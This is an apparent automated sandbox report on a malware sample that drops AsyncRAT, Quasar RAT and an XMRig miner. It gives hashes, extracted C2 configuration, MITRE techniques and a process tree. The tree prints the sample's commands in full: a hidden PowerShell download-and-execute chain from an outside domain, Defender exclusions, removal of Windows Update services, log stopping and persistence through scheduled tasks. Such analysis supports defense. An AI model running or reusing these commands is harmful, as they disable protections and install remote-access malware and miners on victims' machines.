asyncrat | 205f00610ab36450d86ad8ebfe7a0f0af7aa757803503ea4de1f82c78e6dedd3

Analysis

max time kernel
33s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
18-08-2024 00:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-08-18_b07903a55bdb2c7ed7895fdeba690458_cova_magniber.exe
Size

8.1MB
MD5

b07903a55bdb2c7ed7895fdeba690458
SHA1

00eb5c9e340664df33ea9369179de712bc5d0773
SHA256

205f00610ab36450d86ad8ebfe7a0f0af7aa757803503ea4de1f82c78e6dedd3
SHA512

cb5df616f85177175e4543b7cda2010275c935f527cfb17c3a384884e6de4dd00a8f676c8e437c9a303573c08419f2f5c8fc30058493ba49abecfd65cae81bef
SSDEEP

196608:B9ofsgFUjh5JMULHIEEUgILxbhVebH0h9HU5NHZlcP/VMfif:B9ofsuUjh5JMULHIEEUgILxbhVebH07H

Score

10^/10

asyncrat quasar xmrig 4drun default discovery evasion execution miner persistence rat spyware trojan upx

Malware Config

Extracted

Family

quasar

Version

1.4.0

Botnet

4Drun

185.148.3.216:4000

Mutex

c3557859-56ac-475e-b44d-e1b60c20d0d0

Attributes

encryption_key
B000736BEBDF08FC1B6696200651882CF57E43E7
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
3dfx Startup
subdirectory
SubDir

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

185.148.3.216:2000

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
true
install_file
4Drs.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000900000002339a-227.dat	family_quasar
behavioral2/memory/2672-229-0x0000000000270000-0x00000000002F4000-memory.dmp	family_quasar

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/files/0x0009000000023487-233.dat	family_asyncrat

XMRig Miner payload 4 IoCs

miner

resource	yara_rule
behavioral2/memory/3256-422-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/3256-421-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/3256-419-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/3256-418-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Blocklisted process makes network request 1 IoCs

flow	pid	Process
18	4584	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
4584	powershell.exe
1092	powershell.exe
5504	powershell.exe
4584	powershell.exe
4128	powershell.exe
3256	powershell.exe
1360	powershell.exe
1200	powershell.exe
4584	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	2024-08-18_b07903a55bdb2c7ed7895fdeba690458_cova_magniber.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	V3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	A.exe

Executes dropped EXE 8 IoCs

pid	Process
3412	Enkou_Succubus.exe
384	V3.exe
2928	1.exe
2268	2.exe
2672	Q.exe
3068	A.exe
680	Client.exe
2280	4Drs.exe

Loads dropped DLL 3 IoCs

pid	Process
3412	Enkou_Succubus.exe
3412	Enkou_Succubus.exe
3412	Enkou_Succubus.exe

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3256-422-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3256-421-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3256-416-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3256-415-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3256-419-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3256-418-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3256-417-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3256-413-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3256-414-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Power Settings 1 TTPs 16 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
3704	powercfg.exe
4956	powercfg.exe
3612	powercfg.exe
4328	cmd.exe
6104	powercfg.exe
3576	powercfg.exe
2492	powercfg.exe
5944	powercfg.exe
4672	cmd.exe
3860	powercfg.exe
1832	powercfg.exe
3040	powercfg.exe
1008	powercfg.exe
3664	powercfg.exe
4020	powercfg.exe
3564	powercfg.exe

Launches sc.exe 21 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3060	sc.exe
116	sc.exe
3668	sc.exe
2472	sc.exe
5776	sc.exe
2272	sc.exe
3692	sc.exe
6116	sc.exe
4940	sc.exe
3804	sc.exe
2336	sc.exe
2528	sc.exe
2928	sc.exe
944	sc.exe
4600	sc.exe
2288	sc.exe
1828	sc.exe
1948	sc.exe
2728	sc.exe
3620	sc.exe
2188	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-08-18_b07903a55bdb2c7ed7895fdeba690458_cova_magniber.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	V3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4Drs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Enkou_Succubus.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	A.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4572	timeout.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
944	schtasks.exe
2984	schtasks.exe
4020	schtasks.exe

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
4584	powershell.exe
4584	powershell.exe
3068	A.exe
3068	A.exe
3068	A.exe
3068	A.exe
3068	A.exe
3068	A.exe
3068	A.exe
3068	A.exe
3068	A.exe
3068	A.exe
3068	A.exe
3068	A.exe
3068	A.exe
3068	A.exe
3068	A.exe
3068	A.exe
3068	A.exe
3068	A.exe
3068	A.exe
3068	A.exe
3068	A.exe
3068	A.exe
3068	A.exe
3068	A.exe
2928	1.exe
4128	powershell.exe
4128	powershell.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: 33	3164	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	3164	AUDIODG.EXE
Token: SeDebugPrivilege	4584	powershell.exe
Token: SeDebugPrivilege	2672	Q.exe
Token: SeDebugPrivilege	680	Client.exe
Token: SeDebugPrivilege	3068	A.exe
Token: SeDebugPrivilege	2280	4Drs.exe
Token: SeDebugPrivilege	2280	4Drs.exe
Token: SeDebugPrivilege	4128	powershell.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
3412	Enkou_Succubus.exe
3412	Enkou_Succubus.exe
2268	2.exe
680	Client.exe

Suspicious use of WriteProcessMemory 48 IoCs

description	pid	Process	procid_target
PID 2328 wrote to memory of 3480	2328	2024-08-18_b07903a55bdb2c7ed7895fdeba690458_cova_magniber.exe	87
PID 2328 wrote to memory of 3480	2328	2024-08-18_b07903a55bdb2c7ed7895fdeba690458_cova_magniber.exe	87
PID 2328 wrote to memory of 3480	2328	2024-08-18_b07903a55bdb2c7ed7895fdeba690458_cova_magniber.exe	87
PID 2328 wrote to memory of 3412	2328	2024-08-18_b07903a55bdb2c7ed7895fdeba690458_cova_magniber.exe	90
PID 2328 wrote to memory of 3412	2328	2024-08-18_b07903a55bdb2c7ed7895fdeba690458_cova_magniber.exe	90
PID 2328 wrote to memory of 3412	2328	2024-08-18_b07903a55bdb2c7ed7895fdeba690458_cova_magniber.exe	90
PID 3480 wrote to memory of 1864	3480	cmd.exe	91
PID 3480 wrote to memory of 1864	3480	cmd.exe	91
PID 3480 wrote to memory of 1864	3480	cmd.exe	91
PID 1864 wrote to memory of 1104	1864	net.exe	92
PID 1864 wrote to memory of 1104	1864	net.exe	92
PID 1864 wrote to memory of 1104	1864	net.exe	92
PID 3480 wrote to memory of 4584	3480	cmd.exe	93
PID 3480 wrote to memory of 4584	3480	cmd.exe	93
PID 3480 wrote to memory of 4584	3480	cmd.exe	93
PID 4584 wrote to memory of 384	4584	powershell.exe	100
PID 4584 wrote to memory of 384	4584	powershell.exe	100
PID 4584 wrote to memory of 384	4584	powershell.exe	100
PID 384 wrote to memory of 2928	384	V3.exe	101
PID 384 wrote to memory of 2928	384	V3.exe	101
PID 384 wrote to memory of 2268	384	V3.exe	102
PID 384 wrote to memory of 2268	384	V3.exe	102
PID 4584 wrote to memory of 2672	4584	powershell.exe	103
PID 4584 wrote to memory of 2672	4584	powershell.exe	103
PID 4584 wrote to memory of 3068	4584	powershell.exe	104
PID 4584 wrote to memory of 3068	4584	powershell.exe	104
PID 4584 wrote to memory of 3068	4584	powershell.exe	104
PID 2672 wrote to memory of 944	2672	Q.exe	107
PID 2672 wrote to memory of 944	2672	Q.exe	107
PID 2672 wrote to memory of 680	2672	Q.exe	109
PID 2672 wrote to memory of 680	2672	Q.exe	109
PID 680 wrote to memory of 2984	680	Client.exe	110
PID 680 wrote to memory of 2984	680	Client.exe	110
PID 3068 wrote to memory of 4384	3068	A.exe	112
PID 3068 wrote to memory of 4384	3068	A.exe	112
PID 3068 wrote to memory of 4384	3068	A.exe	112
PID 3068 wrote to memory of 636	3068	A.exe	113
PID 3068 wrote to memory of 636	3068	A.exe	113
PID 3068 wrote to memory of 636	3068	A.exe	113
PID 4384 wrote to memory of 4020	4384	cmd.exe	116
PID 4384 wrote to memory of 4020	4384	cmd.exe	116
PID 4384 wrote to memory of 4020	4384	cmd.exe	116
PID 636 wrote to memory of 4572	636	cmd.exe	117
PID 636 wrote to memory of 4572	636	cmd.exe	117
PID 636 wrote to memory of 4572	636	cmd.exe	117
PID 636 wrote to memory of 2280	636	cmd.exe	118
PID 636 wrote to memory of 2280	636	cmd.exe	118
PID 636 wrote to memory of 2280	636	cmd.exe	118

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\2024-08-18_b07903a55bdb2c7ed7895fdeba690458_cova_magniber.exe
"C:\Users\Admin\AppData\Local\Temp\2024-08-18_b07903a55bdb2c7ed7895fdeba690458_cova_magniber.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2328
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Public\config.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3480
- - C:\Windows\SysWOW64\net.exe
    net session
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1864
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 session
      4⤵
      System Location Discovery: System Language Discovery
      PID:1104
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle hidden Add-MpPreference -ExclusionPath C:\Users;Add-MpPreference -ExclusionPath $env:ProgramFiles;cd C:\Users\Public;Invoke-WebRequest https://jeuxviddeo.com/V3 -OutFile V3.exe;./V3.exe;Invoke-WebRequest https://jeuxviddeo.com/ifl1rm8lvhdlsfmmdc -OutFile Q.exe;./Q.exe;Invoke-WebRequest https://jeuxviddeo.com/nuc4dofedqp6mruigq -OutFile A.exe;./A.exe;exit
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4584
  - - C:\Users\Public\V3.exe
      "C:\Users\Public\V3.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:384
    - - C:\Users\Public\1.exe
        
        "C:\Users\Public\1.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2928
      - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4128
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:3484
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        
        PID:2272
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:944
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:4600
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:1948
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        6⤵
        Launches sc.exe
        
        PID:2288
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        6⤵
        Launches sc.exe
        
        PID:4940
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        6⤵
        Power Settings
        
        PID:3040
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        6⤵
        Power Settings
        
        PID:3612
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        6⤵
        Power Settings
        
        PID:4956
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        6⤵
        Power Settings
        
        PID:3704
      - C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe
        6⤵
        
        PID:2328
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "WAGDKRVZ"
        6⤵
        Launches sc.exe
        
        PID:2728
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "WAGDKRVZ" binpath= "C:\ProgramData\mxergolzfguk\kaptsegthwf.exe" start= "auto"
        6⤵
        Launches sc.exe
        
        PID:3060
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        6⤵
        Launches sc.exe
        
        PID:3668
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "WAGDKRVZ"
        6⤵
        Launches sc.exe
        
        PID:2528
    - - C:\Users\Public\2.exe
        
        "C:\Users\Public\2.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2268
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3256
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        6⤵
        
        PID:2380
        
        C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        7⤵
        Launches sc.exe
        
        PID:3804
        
        C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        7⤵
        Launches sc.exe
        
        PID:2336
        
        C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        7⤵
        Launches sc.exe
        
        PID:116
        
        C:\Windows\system32\sc.exe
        
        sc stop bits
        7⤵
        Launches sc.exe
        
        PID:1828
        
        C:\Windows\system32\sc.exe
        
        sc stop dosvc
        7⤵
        Launches sc.exe
        
        PID:3620
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        7⤵
        
        PID:3564
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
        7⤵
        
        PID:3904
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        7⤵
        
        PID:5052
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
        7⤵
        
        PID:4940
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        7⤵
        
        PID:372
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        6⤵
        Power Settings
        
        PID:4672
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        7⤵
        Power Settings
        
        PID:3860
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        7⤵
        Power Settings
        
        PID:1832
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        7⤵
        Power Settings
        
        PID:1008
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        7⤵
        Power Settings
        
        PID:3664
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1092
      - C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe
        6⤵
        
        PID:4844
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell <#byjeowvd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "Barac" } Else { "C:\Program Files\Cuis\bon\Bara.exe" }
        6⤵
        
        PID:4792
        
        C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /run /tn Barac
        7⤵
        
        PID:3628
  - - C:\Users\Public\Q.exe
      "C:\Users\Public\Q.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2672
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\Public\Q.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:944
    - - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:680
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2984
  - - C:\Users\Public\A.exe
      "C:\Users\Public\A.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3068
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "4Drs" /tr '"C:\Users\Admin\AppData\Roaming\4Drs.exe"' & exit
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4384
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "4Drs" /tr '"C:\Users\Admin\AppData\Roaming\4Drs.exe"'
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:4020
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD65B.tmp.bat""
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:636
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        6⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:4572
      - C:\Users\Admin\AppData\Roaming\4Drs.exe
        
        "C:\Users\Admin\AppData\Roaming\4Drs.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2280
- C:\Users\Public\Enkou_Succubus.exe
  "C:\Users\Public\Enkou_Succubus.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3412

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x50c 0x504
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3164

C:\ProgramData\mxergolzfguk\kaptsegthwf.exe
C:\ProgramData\mxergolzfguk\kaptsegthwf.exe
1⤵
PID:1948
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:3384
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:3108
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2928
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:2272
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2188
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:3692
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2472
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:4020
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:2492
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:3564
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:3576
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:4352
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:4572
- C:\Windows\system32\dialer.exe
  dialer.exe
  2⤵
  PID:3256

C:\Program Files\Cuis\bon\Bara.exe
"C:\Program Files\Cuis\bon\Bara.exe"
1⤵
PID:1008
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1200
- C:\Windows\system32\cmd.exe
  cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:5340
- - C:\Windows\system32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:5776
- - C:\Windows\system32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:6116
- C:\Windows\system32\cmd.exe
  cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:4328
- - C:\Windows\system32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:5944
- - C:\Windows\system32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:6104
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
